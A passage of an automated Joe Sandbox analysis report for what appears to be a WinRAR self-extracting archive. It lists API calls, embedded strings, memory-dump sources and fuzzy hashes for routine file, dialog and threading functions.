                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: ASKNEXTVOL
                                                                                    • API String ID: 445417207-3402441367
                                                                                    • Opcode ID: b4f1a344aaf61545b90d33f5a351510daf4b57a458f8f6c9be0360bf22a7aeae
                                                                                    • Instruction ID: 0daaac8adc64665abf365a414fa80421c93ffb67968e095b980bec1c8d57e21f
                                                                                    • Opcode Fuzzy Hash: b4f1a344aaf61545b90d33f5a351510daf4b57a458f8f6c9be0360bf22a7aeae
                                                                                    • Instruction Fuzzy Hash: 3011E632390210BFE711CF68EC0AFAA376DEF4A702F604000F2C0DB5AAC76D99059766
                                                                                    APIs
                                                                                    • DialogBoxParamW.USER32(GETPASSWORD1,00010486,0073B270,?,?), ref: 0073DE18
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: DialogParam
                                                                                    • String ID: GETPASSWORD1$rs$xzw
                                                                                    • API String ID: 665744214-3318730764
                                                                                    • Opcode ID: 24462ceb425b147ec94e3df4bea4b6a1213daf78b93f3799ee9ccfb6950ac145
                                                                                    • Instruction ID: e0b0b3de8aee65c9b4b44b9ac7d132345f23244f5bcda0e665cba20d3fa6b015
                                                                                    • Opcode Fuzzy Hash: 24462ceb425b147ec94e3df4bea4b6a1213daf78b93f3799ee9ccfb6950ac145
                                                                                    • Instruction Fuzzy Hash: 2D110B72640254AAEF22DE34BC06BAB3B94A705751F148075FD4AAB092CBFCAD44C774
                                                                                    APIs
                                                                                    • __fprintf_l.LIBCMT ref: 0072D954
                                                                                    • _strncpy.LIBCMT ref: 0072D99A
                                                                                      • Part of subcall function 00731DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00761030,00000200,0072D928,00000000,?,00000050,00761030), ref: 00731DC4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                    • String ID: $%s$@%s
                                                                                    • API String ID: 562999700-834177443
                                                                                    • Opcode ID: 385157331881866287f1723ab75f3f4c01b85e87f4e439809837cd66eddb367f
                                                                                    • Instruction ID: 32a3c694422b8237202525c493174bbbe71e4d93ccebe7be3e681bc10ebb04c3
                                                                                    • Opcode Fuzzy Hash: 385157331881866287f1723ab75f3f4c01b85e87f4e439809837cd66eddb367f
                                                                                    • Instruction Fuzzy Hash: E621907244025CEAEB31EEA4DC05FDE7BA8EF05300F044126F990961A2E779EA988B51
                                                                                    APIs
                                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0072AC5A,00000008,?,00000000,?,0072D22D,?,00000000), ref: 00730E85
                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0072AC5A,00000008,?,00000000,?,0072D22D,?,00000000), ref: 00730E8F
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0072AC5A,00000008,?,00000000,?,0072D22D,?,00000000), ref: 00730E9F
                                                                                    Strings
                                                                                    • Thread pool initialization failed., xrefs: 00730EB7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                    • String ID: Thread pool initialization failed.
                                                                                    • API String ID: 3340455307-2182114853
                                                                                    • Opcode ID: bfc10921bfaa67f63b7f4ffbd4d661a42aeb3396380515d9361b13b5122854f3
                                                                                    • Instruction ID: 2a493da21535033cfc96f1cfbc4d90e9e64c8e074360f885139055ebf2eaf746
                                                                                    • Opcode Fuzzy Hash: bfc10921bfaa67f63b7f4ffbd4d661a42aeb3396380515d9361b13b5122854f3
                                                                                    • Instruction Fuzzy Hash: DF11A3B174070C9FD3216F769C889A7FBECEB54754F144C2EF1DAC2201D6B969808BA4
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Malloc
                                                                                    • String ID: (s$2s$A
                                                                                    • API String ID: 2696272793-3699640820
                                                                                    • Opcode ID: 79b28cf346e344f66fb151995496e40c840d158a6cb1ea9784dd44b7bdbf5c37
                                                                                    • Instruction ID: 1e2223f70b577ee5254c014553fcd74677307ee944acad906459f4288d5710d9
                                                                                    • Opcode Fuzzy Hash: 79b28cf346e344f66fb151995496e40c840d158a6cb1ea9784dd44b7bdbf5c37
                                                                                    • Instruction Fuzzy Hash: FE01DB75901229ABCB14DFA4E844ADEBBF8FF09710B20415AE905E7250D7789A40CF94
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                    • API String ID: 0-56093855
                                                                                    • Opcode ID: f10e708e823852069c3df4ff2a12238bef789f53a3e3545c133f969f9e7c6857
                                                                                    • Instruction ID: 4ff6766fd68c9d46ead6690b3486ced1d2cccefb9832ce845822592a61044ecd
                                                                                    • Opcode Fuzzy Hash: f10e708e823852069c3df4ff2a12238bef789f53a3e3545c133f969f9e7c6857
                                                                                    • Instruction Fuzzy Hash: C001B575614385AFEB614FA8FC049567FA5F708394F148136F80693232CB7C8C90DBA6
                                                                                    APIs
                                                                                      • Part of subcall function 0072E2E8: _swprintf.LIBCMT ref: 0072E30E
                                                                                      • Part of subcall function 0072E2E8: _strlen.LIBCMT ref: 0072E32F
                                                                                      • Part of subcall function 0072E2E8: SetDlgItemTextW.USER32(?,0075E274,?), ref: 0072E38F
                                                                                      • Part of subcall function 0072E2E8: GetWindowRect.USER32(?,?), ref: 0072E3C9
                                                                                      • Part of subcall function 0072E2E8: GetClientRect.USER32(?,?), ref: 0072E3D5
                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 0072135A
                                                                                    • SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                    • String ID: s$0
                                                                                    • API String ID: 2622349952-570894310
                                                                                    • Opcode ID: fbd0dc3130c47c973e0cb99cdfc13c7f8afabbe5f4331ddda25eab9248405a05
                                                                                    • Instruction ID: ceed230df425bbfc0c81d8db20f3833838c79e436b609ec5a0c70ae6fa36a913
                                                                                    • Opcode Fuzzy Hash: fbd0dc3130c47c973e0cb99cdfc13c7f8afabbe5f4331ddda25eab9248405a05
                                                                                    • Instruction Fuzzy Hash: 50F0C2311443ACAADF158F64EC0DBEA3B9BBF20784F498124FC45909A2DB7CC990EB10
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: __alldvrm$_strrchr
                                                                                    • String ID:
                                                                                    • API String ID: 1036877536-0
                                                                                    • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                    • Instruction ID: bdeb26fcac3de2d2c292500fac221b22670970833f1ca1814ec9624a958afd65
                                                                                    • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                    • Instruction Fuzzy Hash: 7CA11472A043869FEB21CF28C8917AFBBE5EF55310F1845ADE6859B282D73C9941C760
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00727F69,?,?,?), ref: 0072A3FA
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00727F69,?), ref: 0072A43E
                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00727F69,?,?,?,?,?,?,?), ref: 0072A4BF
                                                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00727F69,?,?,?,?,?,?,?,?,?,?), ref: 0072A4C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                    • String ID:
                                                                                    • API String ID: 2287278272-0
                                                                                    • Opcode ID: 9ab11fcd17f32d304cf4d36fd094aef873e821b8e3e8fca6c62c977b37979761
                                                                                    • Instruction ID: 1e684a73b094345248536598ddd106ebcefafe639fcd7fc95a69fd90254390fb
                                                                                    • Opcode Fuzzy Hash: 9ab11fcd17f32d304cf4d36fd094aef873e821b8e3e8fca6c62c977b37979761
                                                                                    • Instruction Fuzzy Hash: 8741CE30248391ABE721EF28EC49FEEBBE4AB90300F04091DB5D4931D1D6A8DA4C9B53
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,007491E0,?,00000000,?,00000001,?,?,00000001,007491E0,?), ref: 0074C9D5
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0074CA5E
                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00746CBE,?), ref: 0074CA70
                                                                                    • __freea.LIBCMT ref: 0074CA79
                                                                                      • Part of subcall function 00748E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0074CA2C,00000000,?,00746CBE,?,00000008,?,007491E0,?,?,?), ref: 00748E38
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                    • String ID:
                                                                                    • API String ID: 2652629310-0
                                                                                    • Opcode ID: 160492602dafee7bdb4f6986e2c4305a8b7d5a2f0e6c9bcef88f903bae00a89f
                                                                                    • Instruction ID: 2d564270878c5035ecfded40e034aa591679c2de812d959179a7d3d6c0711b23
                                                                                    • Opcode Fuzzy Hash: 160492602dafee7bdb4f6986e2c4305a8b7d5a2f0e6c9bcef88f903bae00a89f
                                                                                    • Instruction Fuzzy Hash: 5B319072A0221AABDF26DF74DC45DEE7BA5EB41350F148168FC04E6261EB39DD50CB90
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 0073A666
                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0073A675
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0073A683
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0073A691
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDevice$Release
                                                                                    • String ID:
                                                                                    • API String ID: 1035833867-0
                                                                                    • Opcode ID: 133c7bbd71f7434e9ac48a6b8872eefea6f70efe60366c51d0ccd459b736d500
                                                                                    • Instruction ID: d1ca2fc1246f3c36894a9c6436843371072adf69502d341c4059af5dc3b394e5
                                                                                    • Opcode Fuzzy Hash: 133c7bbd71f7434e9ac48a6b8872eefea6f70efe60366c51d0ccd459b736d500
                                                                                    • Instruction Fuzzy Hash: 84E01D31982721F7D3615F65FC4EF8B3E55AB05F92F118101F605951D0DF7C45008B9A
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcschr
                                                                                    • String ID: .lnk$ds
                                                                                    • API String ID: 2691759472-1819217326
                                                                                    • Opcode ID: 3cb0bd940c676f96703609ae72cc16db184e53bc6c1d69a98ffa17538498f3b6
                                                                                    • Instruction ID: a780ea51195344ca51725b2f1cdb487c20d99200bf7fb6156ec6cc7c409d317f
                                                                                    • Opcode Fuzzy Hash: 3cb0bd940c676f96703609ae72cc16db184e53bc6c1d69a98ffa17538498f3b6
                                                                                    • Instruction Fuzzy Hash: DDA1317290012996EF34DBA4DD59EFA73FCAF44304F0885A6B509E7142EF789F848B61
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 007275E3
                                                                                      • Part of subcall function 007305DA: _wcslen.LIBCMT ref: 007305E0
                                                                                      • Part of subcall function 0072A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0072A598
                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0072777F
                                                                                      • Part of subcall function 0072A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0072A325,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A501
                                                                                      • Part of subcall function 0072A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0072A325,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A532
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                    • String ID: :
                                                                                    • API String ID: 3226429890-336475711
                                                                                    • Opcode ID: adcf2ebc30a80a9dab05f85128509530999918f4a090584c96ff1a10326570d1
                                                                                    • Instruction ID: 1a38f0851ea02628fefc6c228bdf855212fdacccc5a932e0732585c9064832b7
                                                                                    • Opcode Fuzzy Hash: adcf2ebc30a80a9dab05f85128509530999918f4a090584c96ff1a10326570d1
                                                                                    • Instruction Fuzzy Hash: 9C419371900268EAEB25EB64ED59EEEB37DAF41300F004096B605A3192DB7C5F85CF71
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcschr
                                                                                    • String ID: *
                                                                                    • API String ID: 2691759472-163128923
                                                                                    • Opcode ID: 7985bc28a83feffab0475d374281f55b75ec3c9c3bcd6989fd07644475e73698
                                                                                    • Instruction ID: e85ac5f1a976302305b7c9b49f4f03069d697e13cf7483fe45f27cbf396c8896
                                                                                    • Opcode Fuzzy Hash: 7985bc28a83feffab0475d374281f55b75ec3c9c3bcd6989fd07644475e73698
                                                                                    • Instruction Fuzzy Hash: 243146325043B19ACB30FE54B986A7B73E4DFA1B50F55801EFD8447143E76E9E829361
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: }
                                                                                    • API String ID: 176396367-4239843852
                                                                                    • Opcode ID: 15db0571cbccbb4bc0eeca3d3a4eb872293faa3b009f3e26f26345f1f4cd3dd4
                                                                                    • Instruction ID: f492b261b45263f8f3b8a301760a611b848dd7af3ca790354d667b6c77510091
                                                                                    • Opcode Fuzzy Hash: 15db0571cbccbb4bc0eeca3d3a4eb872293faa3b009f3e26f26345f1f4cd3dd4
                                                                                    • Instruction Fuzzy Hash: CA21F37290531A9AEB31EA64D849F6FB3DCDF81750F04042AF684C3143EB6DDD5883A2
                                                                                    APIs
                                                                                      • Part of subcall function 0072F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0072F2E4
                                                                                      • Part of subcall function 0072F2C5: GetProcAddress.KERNEL32(007681C8,CryptUnprotectMemory), ref: 0072F2F4
                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,0072F33E), ref: 0072F3D2
                                                                                    Strings
                                                                                    • CryptProtectMemory failed, xrefs: 0072F389
                                                                                    • CryptUnprotectMemory failed, xrefs: 0072F3CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                    • API String ID: 2190909847-396321323
                                                                                    APIs
                                                                                    • CreateThread.KERNEL32(00000000,00010000,00731160,?,00000000,00000000), ref: 00731043
                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 0073108A
                                                                                      • Part of subcall function 00726C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00726C54
                                                                                      • Part of subcall function 00726DCB: _wcschr.LIBVCRUNTIME ref: 00726E0A
                                                                                      • Part of subcall function 00726DCB: _wcschr.LIBVCRUNTIME ref: 00726E19
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                    • String ID: CreateThread failed
                                                                                    • API String ID: 2706921342-3849766595
                                                                                    APIs
                                                                                    • VirtualQuery.KERNEL32(80000000,0073E5E8,0000001C,0073E7DD,00000000,?,?,?,?,?,?,?,0073E5E8,00000004,00781CEC,0073E86D), ref: 0073E6B4
                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0073E5E8,00000004,00781CEC,0073E86D), ref: 0073E6CF
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                    • String ID: D
                                                                                    • API String ID: 401686933-2746444292
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _wcschr
                                                                                    • String ID: <9u$?*<>|"
                                                                                    • API String ID: 2691759472-1881834610
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: Software\WinRAR SFX$s
                                                                                    • API String ID: 176396367-1940952233
                                                                                    APIs
                                                                                      • Part of subcall function 0072C29A: _wcslen.LIBCMT ref: 0072C2A2
                                                                                      • Part of subcall function 00731FDD: _wcslen.LIBCMT ref: 00731FE5
                                                                                      • Part of subcall function 00731FDD: _wcslen.LIBCMT ref: 00731FF6
                                                                                      • Part of subcall function 00731FDD: _wcslen.LIBCMT ref: 00732006
                                                                                      • Part of subcall function 00731FDD: _wcslen.LIBCMT ref: 00732014
                                                                                      • Part of subcall function 00731FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0072B371,?,?,00000000,?,?,?), ref: 0073202F
                                                                                      • Part of subcall function 0073AC04: SetCurrentDirectoryW.KERNELBASE(?,0073AE72,C:\Users\user\AppData\Local\Temp\RarSFX0,00000000,0076946A,00000006), ref: 0073AC08
                                                                                    • _wcslen.LIBCMT ref: 0073AE8B
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _wcslen$CompareCurrentDirectoryString
                                                                                    • String ID: <s$C:\Users\user\AppData\Local\Temp\RarSFX0
                                                                                    • API String ID: 521417927-3664127294
                                                                                    APIs
                                                                                      • Part of subcall function 007497E5: GetLastError.KERNEL32(?,00761030,00744674,00761030,?,?,00743F73,00000050,?,00761030,00000200), ref: 007497E9
                                                                                      • Part of subcall function 007497E5: _free.LIBCMT ref: 0074981C
                                                                                      • Part of subcall function 007497E5: SetLastError.KERNEL32(00000000,?,00761030,00000200), ref: 0074985D
                                                                                      • Part of subcall function 007497E5: _abort.LIBCMT ref: 00749863
                                                                                    • _abort.LIBCMT ref: 0074BB80
                                                                                    • _free.LIBCMT ref: 0074BBB4
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: ErrorLast_abort_free
                                                                                    • String ID: pu
                                                                                    • API String ID: 289325740-250260183
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Malloc
                                                                                    • String ID: (s$Zs
                                                                                    • API String ID: 2696272793-2692220788
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00731206,?), ref: 00730FEA
                                                                                    • GetLastError.KERNEL32(?), ref: 00730FF6
                                                                                      • Part of subcall function 00726C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00726C54
                                                                                    Strings
                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00730FFF
                                                                                    Similarity
                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                    • API String ID: 1091760877-2248577382
                                                                                    • Opcode ID: 1664807d70748182be6a0d80c9f881c4131744438cee2955c90745af24283dc0
                                                                                    • Instruction ID: 91f37aa08218467ade51aee10557c940de274cd74cfd876c7909ae71a13b797c
                                                                                    • Opcode Fuzzy Hash: 1664807d70748182be6a0d80c9f881c4131744438cee2955c90745af24283dc0
